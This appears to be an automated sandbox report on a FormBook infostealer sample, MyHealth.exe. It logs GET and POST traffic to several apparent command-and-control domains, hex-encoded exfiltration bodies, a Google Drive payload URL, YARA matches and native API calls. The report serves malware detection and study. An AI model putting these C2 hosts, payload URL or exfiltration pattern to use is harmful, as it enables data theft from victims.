74 6b 58 6a 51 61 6e 6c 36 50 35 6f 61 4f 59 32 78 6f 50 55 59 78 76 55 71 5a 5f 4d 44 62 6c 4b 66 51 46 69 62 36 6f 4d 55 41 4b 73 65 31 48 41 4c 47 31 4d 5f 61 66 47 66 50 6e 59 78 74 4a 64 6d 33 6b 36 4b 41 6e 4e 75 4e 6f 6b 43 43 38 37 35 55 66 6b 31 52 6a 4b 63 42 74 30 37 62 66 59 38 6c 69 62 4b 79 31 32 37 50 52 7e 65 34 38 37 34 39 30 65 4c 65 43 4c 6e 4f 65 49 58 71 32 6d 6b 77 51 31 6a 44 63 59 65 36 43 37 57 66 64 35 44 67 5a 30 4e 72 33 32 59 50 63 70 6a 4e 49 77 51 71 6b 47 5a 65 53 70 5f 6a 57 43 45 52 59 4d 41 32 70 74 44 70 7a 30 32 6f 61 6e 70 6f 37 46 63 34 6e 49 6d 65 38 30 70 58 30 46 4c 56 41 61 6
Source: global trafficHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.workingtechnologiesmexico.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.workingtechnologiesmexico.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.workingtechnologiesmexico.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 55 44 4d 4f 73 6b 44 45 4e 5a 6e 65 65 65 5a 6d 52 7a 61 73 41 73 75 47 75 73 35 61 76 78 62 6a 33 4a 51 55 7e 64 35 4f 34 57 69 32 61 48 74 35 4d 37 41 55 6a 71 73 4d 49 5a 50 57 71 34 42 59 35 31 74 44 67 4a 55 66 58 69 6b 57 50 45 4c 62 6a 48 42 48 74 57 65 4f 43 70 46 6a 39 73 67 47 68 4c 70 41 57 6c 70 4e 72 4b 31 43 43 6e 48 54 65 4e 31 34 32 2d 4b 61 6c 39 66 56 6c 5f 64 55 76 53 74 4e 6e 38 4d 59 66 4d 54 76 52 50 6d 5f 57 31 34 66 31 7a 51 38 7a 64 58 77 45 53 4d 34 49 41 6b 48 55 68 4d 76 58 73 57 5f 43 47 46 73 42 6e 45 31 28 62 46 52 4f 5a 66 67 4d 51 58 30 67 38 61 74 38 39 34 6d 6e 68 45 44 6f 4b 44 77 74 67 74 39 70 42 49 36 73 7a 4e 67 44 37 34 42 7a 74 4b 45 69 42 50 48 67 32 34 39 59 41 54 4f 61 7a 62 34 31 5f 66 77 52 77 65 4d 36 45 44 77 66 62 63 30 7a 4c 6c 71 52 4f 65 64 67 50 6c 56 43 57 38 70 4d 30 71 33 43 6d 74 68 30 44 70 35 31 5a 54 51 58 67 49 68 77 65 6a 4e 79 6f 77 67 39 55 54 47 77 4f 54 58 34 50 4f 79 59 39 34 48 7a 45 48 6d 6f 35 77 54 51 36 33 57 63 42 37 35 41 37 41 68 6b 77 5a 2d 47 6d 68 47 33 48 52 69 63 74 59 74 47 54 64 34 78 33 6f 78 72 4e 73 2d 68 35 5a 35 42 43 38 73 73 35 45 30 31 55 48 42 62 32 65 42 55 45 65 35 57 43 42 75 6f 66 4b 67 4c 4e 6a 4b 74 6d 64 54 75 63 4c 74 57 78 35 74 48 55 72 5f 61 62 61 74 4c 6e 59 69 28 37 63 67 67 4b 52 30 67 5a 63 76 48 43 43 52 49 39 64 57 69 58 37 6f 56 65 66 69 79 6d 45 6a 68 31 63 32 4d 5f 32 72 72 41 51 4e 28 54 6e 76 58 67 61 56 43 30 6b 54 28 7a 48 46 69 75 51 78 78 44 34 2d 69 74 62 51 52 6d 4a 34 48 54 37 38 66 54 74 31 79 71 73 30 6c 33 73 59 4b 37 51 54 70 34 6e 57 30 65 65 64 75 44 55 78 58 4c 53 32 44 4d 46 61 50 53 75 70 32 39 65 50 36 4f 57 35 4b 47 39 45 54 30 61 69 46 74 59 61 4b 33 30 63 70 61 54 55 4b 4f 48 6b 68 44 79 52 42 2d 68 67 35 6d 49 4c 76 37 78 78 45 7a 4f 45 58 4b 69 44 7a 57 7a 75 49 53 73 76 4e 39 61 79 44 5a 43 6c 68 73 52 57 78 75 39 2d 37 34 57 67 6f 31 62 57 4d 67 70 76 32 57 55 6d 61 74 75 38 76 38 54 54 72 64 38 51 4b 5f 6d 58 39 46 61 32 51 79 36 63 7a 62 35 4b 55 64 66 6f 7a 74 63 7a 4e 44 7a 38 76 49 6f 6d 56 6a 51 31 28 32 6e 72 6c 4f 6f 6c 7a 4e 33 4c 63 73 52 69 7a 44 6c 4c 58 6e 6f 4e 36 65 51 32 38 78 62 2d 48 5f 53 5a 7a 54 63 52 46 48 71 52 7e 48 74 79 49 5f 4a 59 34 4d 55 32 46 36 28 38 47 4b 7e 70 70 68 77 42 77 55 51 44 73 6b 6c 4f 76 44 77 68 7a 37 31 71 6d 64 37 41 33 58 53 4f 5a 46 62 5f 52 54 52 77 63 7a 4d 68 6c 49 54 4f 6f 69 70 46 4b 55 4c 62 67 36 62 42 36 55 75 75 30 41 6e 55 4e 63 34 77 6b 41 7a 67 41 71 64 77 43 67 55 6f 58 59 39 76 78 39 64 31 4
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /w0k/?Ttxh=BsZtdbGEqYRX9CHRV2gAtaO3s0ulgLgaWCJNpi2XP7BrmOUg8feAdzCwhS6+qMEp0P/Y&GVm=4hedNPC8WB6p HTTP/1.1Host: www.factorylegends.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /w0k/?Ttxh=bOZei0djbqQh4s/jjsK6/wovAQFBdVAJChW9V931OnaIZSC2PGiIkIz/okgGLWbQ2jbY&GVm=4hedNPC8WB6p HTTP/1.1Host: www.frawgboy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /w0k/?Ttxh=PcDZAYiJMyi1sNPMwoDVqsoC1cthxoAbOhKng71B3qX+ijDUh+XAYLydGv6YiAGIrKQP&GVm=4hedNPC8WB6p HTTP/1.1Host: www.kiheielectricbikes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /w0k/?Ttxh=K42Ma8CsrX67CksjQH12R0Ttz7K+7j+uYmNE91+lE2r7D1u+oYQSBjHsLCqRW2+VsJ6V&GVm=4hedNPC8WB6p HTTP/1.1Host: www.3365ssr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /w0k/?Ttxh=GyxwCZ1M+WopjQK5e9tGW3/PGaHjfFVHL5opZNL+ev8OmAkRdzMLOIFVrphwPYji8i11&GVm=4hedNPC8WB6p HTTP/1.1Host: www.sebasview.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /w0k/?Ttxh=vO9Vm2RARflm5p1PFXqn6eBrWTFFnunBf6X3DMkFEdmGbjkCk/pABuPtOpuxvLvCis20&GVm=4hedNPC8WB6p HTTP/1.1Host: www.michalshahar.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /w0k/?Ttxh=sem+50/0YH3mEWESa99Xfx4+r5czIuNqkkKFb8xjbyQB4/frawbs3iCD49k7i6p7/qu6&GVm=4hedNPC8WB6p HTTP/1.1Host: www.nacemo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /w0k/?Ttxh=chA0yBmUTNqQLPZwVUvzar2BiddoiQLWjuJCjqNw20a2YkZ8Mux+jO9XQqSfhLpE4lVG&GVm=4hedNPC8WB6p HTTP/1.1Host: www.workingtechnologiesmexico.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /w0k/?Ttxh=BsZtdbGEqYRX9CHRV2gAtaO3s0ulgLgaWCJNpi2XP7BrmOUg8feAdzCwhS6+qMEp0P/Y&GVm=4hedNPC8WB6p HTTP/1.1Host: www.factorylegends.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /w0k/?Ttxh=bOZei0djbqQh4s/jjsK6/wovAQFBdVAJChW9V931OnaIZSC2PGiIkIz/okgGLWbQ2jbY&GVm=4hedNPC8WB6p HTTP/1.1Host: www.frawgboy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: doc-0k-3c-docs.googleusercontent.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.frawgboy.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.frawgboy.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frawgboy.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 54 73 56 6b 38 52 38 55 44 4d 64 5f 6a 76 7a 4b 71 6f 44 46 72 67 51 4c 51 41 56 50 66 52 49 33 5a 55 44 50 51 5f 33 59 47 48 6d 76 4a 78 54 70 42 48 54 5f 70 64 36 55 38 58 68 35 45 31 79 5f 33 6a 4b 4c 51 6c 52 4e 37 37 6d 4b 75 65 48 48 36 74 6a 47 71 6c 36 30 39 41 47 57 30 52 57 6b 66 79 47 4d 62 2d 79 6f 6e 66 57 45 45 5a 67 6d 7e 73 31 76 74 50 4b 70 41 6c 6c 2d 49 79 65 61 41 35 45 52 47 4d 61 55 73 73 49 76 37 4b 7a 5a 63 6e 79 54 4c 53 33 36 56 65 67 44 77 78 4b 70 71 52 4e 54 57 75 72 4b 49 69 74 4a 46 46 6c 41 56 47 6b 61 68 4c 44 53 4d 72 6a 49 5a 50 45 34 7a 45 6e 57 69 5f 42 58 56 36 71 39 68 74 63 6d 68 70 45 4a 61 39 79 63 56 61 42 57 76 54 67 42 4b 56 46 79 75 4d 79 42 61 4e 37 79 4e 47 45 65 79 72 79 72 56 64 55 33 6e 44 57 76 35 49 35 68 31 49 50 32 55 4a 49 74 65 4c 36 65 75 61 61 67 58 53 69 54 52 73 73 5a 66 4a 69 41 35 33 77 69 4d 48 44 79 66 70 77 75 39 5f 67 55 67 38 45 79 62 59 54 79 43 4a 63 65 5a 6e 47 5f 58 6b 36 50 78 47 70 54 58 5f 4d 4c 72 66 73 4e 73 38 56 31 4e 30 77 77 76 44 33 78 6d 4b 51 52 5a 4e 77 4c 6c 32 31 66 4f 53 72 30 51 52 62 4f 6a 30 66 61 65 43 53 46 66 68 37 6b 74 65 52 59 57 44 66 5f 57 5a 6f 78 76 74 38 63 33 54 35 76 28 71 32 63 65 31 41 62 48 6f 34 57 36 34 74 51 6c 52 62 4d 76 43 46 61 44 53 78 41 4c 54 79 6f 62 62 45 76 38 31 70 62 4b 43 65 59 35 34 41 32 76 30 72 32 34 61 33 58 4a 52 68 39 6a 45 66 66 55 6c 31 76 4f 30 64 6b 68 37 34 48 68 44 69 2d 46 79 36 6b 48 34 76 6d 42 59 68 4c 57 63 78 68 49 62 67 6c 7a 44 50 77 39 55 30 62 65 42 4b 49 51 52 62 69 4b 37 6c 55 49 35 79 7a 76 4b 69 71 6f 61 51 45 48 70 43 4a 77 79 43 38 7e 68 49 66 44 34 71 41 4a 43 58 4d 37 6f 7e 32 76 2d 67 71 56 6b 42 63 54 64 58 52 74 56 4b 43 71 4a 34 70 7a 54 41 63 35 62 6c 6d 6c 77 38 70 7e 58 78 2d 56 43 4f 34 52 6f 34 38 59 49 71 55 76 37 50 4a 68 50 76 75 34 54 39 6d 6f 2d 46 2d 77 34 34 2d 76 51 54 6f 68 76 39 2d 36 49 47 7a 50 6c 59 66 70 41 6a 63 63 6d 30 37 47 4a 77 4c 42 76 68 5f 32 53 38 44 53 71 50 54 69 66 6e 74 79 39 44 38 74 41 71 42 7a 5f 49 4f 4b 2d 4c 44 4c 48 50 48 43 4d 62 70 35 53 31 44 53 58 45 4b 4b 79 6e 58 59 66 58 4d 58 46 30 6f 50 6a 63 44 66 31 32 52 75 4d 45 6c 6d 78 6f 65 61 42 43 79 42 77 53 52 6d 53 31 32 39 53 6c 47 76 53 46 46 46 47 41 75 46 73 75 4a 75 5a 44 6c 7e 57 7a 30 71 42 57 73 68 4a 78 4e 78 4c 53 4a 71 5a 58 4f 50 35 69 71 6d 4f 37 4d 58 64 4a 55 52 5f 37 52 4a 6c 30 43 54 31 66 51 6b 32 78 30 41 4a 51 30 45 48 6a 49 44 79 4a 55 4c 41 54 61 6a 77 6c 75 54 38 55 46 35 72 58 49 30 6c 63 63 4a 41 55 4b 31 64 5a 6a 74 66 4d 4a 6f 47 6a 70 71 6c 39 6f 72 63 52 59 6f 5
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 20 Mar 2020 13:10:49 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Urls found in memory or binary dataShow sources
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: jj0t1be8.exe, 00000010.00000003.1070374162.00000000009C7000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1.crl0
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
Source: MyHealth.exe, 00000002.00000002.829860433.00000000004F0000.00000040.00000001.sdmp, jj0t1be8.exe, 0000000F.00000002.1075948123.0000000002A50000.00000040.00000001.sdmp, jj0t1be8.exe, 00000010.00000002.1086535542.00000000004F0000.00000040.00000001.sdmp, jj0t1be8.exe, 00000011.00000002.1090982948.00000000004F0000.00000040.00000001.sdmpString found in binary or memory: http://myurl/myfile.bin
Source: jj0t1be8.exe, 00000010.00000003.1070146631.000000000098B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.g2
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
Source: jj0t1be8.exe, 00000010.00000003.1070374162.00000000009C7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o10
Source: jj0t1be8.exe, 00000010.00000003.1070374162.00000000009C7000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.800524392.0000000007B92000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: jj0t1be8.exe, 00000010.00000003.1070146631.000000000098B000.00000004.00000001.sdmp, jj0t1be8.exe, 00000010.00000003.1067054699.00000000009AF000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/support/accounts/answer/151657?hl=en
Source: jj0t1be8.exe, 00000010.00000003.1070146631.000000000098B000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/support/accounts/answer/151657?hl_
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.806071246.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmp, jj0t1be8.exe, 00000010.00000003.1070146631.000000000098B000.00000004.00000001.sdmpString found in binary or memory: https://doc-14-bo-docs.googleusercontent.com/
Source: jj0t1be8.exe, 00000010.00000003.1070146631.000000000098B000.00000004.00000001.sdmpString found in binary or memory: https://doc-14-bo-docs.googleusercontent.com/;
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmpString found in binary or memory: https://doc-14-bo-docs.googleusercontent.com/K
Source: jj0t1be8.exe, 00000010.00000003.1070146631.000000000098B000.00000004.00000001.sdmpString found in binary or memory: https://doc-14-bo-docs.googleusercontent.com/doI
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmpString found in binary or memory: https://doc-14-bo-docs.googleusercontent.com/docs/securesc/plapmduvvfganab5gel4b10ifq42kjev/4
Source: jj0t1be8.exe, 00000010.00000003.1070146631.000000000098B000.00000004.00000001.sdmpString found in binary or memory: https://doc-14-bo-docs.googleusercontent.com/docs/securesc/plapmduvvfganab5gel4b10ifq42kjev/45cqeqn6
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/LC1
Source: jj0t1be8.exe, 00000010.00000003.1070146631.000000000098B000.00000004.00000001.sdmp, jj0t1be8.exe, 00000010.00000003.1067054699.00000000009AF000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/nonceSigner?nonce=pgpoiipb1iqgc&continue=https://doc-14-bo-docs.googleuserco
Source: jj0t1be8.exe, 00000010.00000003.1070146631.000000000098B000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/nonceSigner?nonce=pgpoiipb1iqgc&continue=https://l
Source: jj0t1be8.exe, 00000010.00000002.1088017475.0000000000920000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmp, jj0t1be8.exe, 00000011.00000002.1090982948.00000000004F0000.00000040.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1k5iIo86I_9tca6MgTVAFkaueamKbSbMT
Source: MyHealth.exe, 00000002.00000002.829860433.00000000004F0000.00000040.00000001.sdmp, jj0t1be8.exe, 0000000F.00000002.1075948123.0000000002A50000.00000040.00000001.sdmp, jj0t1be8.exe, 00000010.00000002.1086535542.00000000004F0000.00000040.00000001.sdmp, jj0t1be8.exe, 00000011.00000002.1090982948.00000000004F0000.00000040.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1k5iIo86I_9tca6MgTVAFkaueamKbSbMT9
Source: jj0t1be8.exe, 00000010.00000002.1088017475.0000000000920000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/x
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443

E-Banking Fraud:

barindex
Yara detected FormBookShow sources
Source: Yara matchFile source: 00000011.00000002.1090820917.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000002.1086202869.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.835867734.000000001F2A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.829435156.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000011.00000002.1101933517.000000001F170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000002.1096990085.000000001F170000.00000040.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000011.00000002.1090820917.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.1090820917.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.1086202869.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.1086202869.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.835867734.000000001F2A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.835867734.000000001F2A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.829435156.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.829435156.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.1101933517.000000001F170000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.1101933517.000000001F170000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.1096990085.000000001F170000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.1096990085.000000001F170000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Potential malicious icon foundShow sources
Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
Contains functionality to call native functionsShow sources
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F53A750 NtCreateFile,LdrInitializeThunk,2_2_1F53A750
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F53A700 NtProtectVirtualMemory,LdrInitializeThunk,2_2_1F53A700
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F53A720 NtResumeThread,LdrInitializeThunk,2_2_1F53A720
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F53A610 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_1F53A610
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F53A6A0 NtCreateSection,LdrInitializeThunk,2_2_1F53A6A0
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F53A540 NtDelayExecution,LdrInitializeThunk,2_2_1F53A540
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F53A560 NtQuerySystemInformation,LdrInitializeThunk,2_2_1F53A560
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F53A5F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_1F53A5F0
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F53A410 NtQueryInformationToken,LdrInitializeThunk,2_2_1F53A410
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F53A480 NtMapViewOfSection,LdrInitializeThunk,2_2_1F53A480
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F53A4A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_1F53A4A0
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F53A360 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_1F53A360
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F53A3E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_1F53A3E0
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F53A240 NtReadFile,LdrInitializeThunk,2_2_1F53A240
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F53A2D0 NtClose,LdrInitializeThunk,2_2_1F53A2D0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 15_2_02A50084 NtSetInformationThread,TerminateProcess,15_2_02A50084
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 15_2_02A525FD NtProtectVirtualMemory,15_2_02A525FD
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 15_2_02A52A1D NtResumeThread,15_2_02A52A1D
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 15_2_02A50E54 NtWriteVirtualMemory,15_2_02A50E54
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 15_2_02A525DA NtProtectVirtualMemory,15_2_02A525DA
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A750 NtCreateFile,LdrInitializeThunk,16_2_1F40A750
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A700 NtProtectVirtualMemory,LdrInitializeThunk,16_2_1F40A700
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A720 NtResumeThread,LdrInitializeThunk,16_2_1F40A720
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A610 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_1F40A610
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A6A0 NtCreateSection,LdrInitializeThunk,16_2_1F40A6A0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A540 NtDelayExecution,LdrInitializeThunk,16_2_1F40A540
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A560 NtQuerySystemInformation,LdrInitializeThunk,16_2_1F40A560
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A5F0 NtReadVirtualMemory,LdrInitializeThunk,16_2_1F40A5F0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A410 NtQueryInformationToken,LdrInitializeThunk,16_2_1F40A410
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A480 NtMapViewOfSection,LdrInitializeThunk,16_2_1F40A480
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A4A0 NtUnmapViewOfSection,LdrInitializeThunk,16_2_1F40A4A0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A360 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_1F40A360
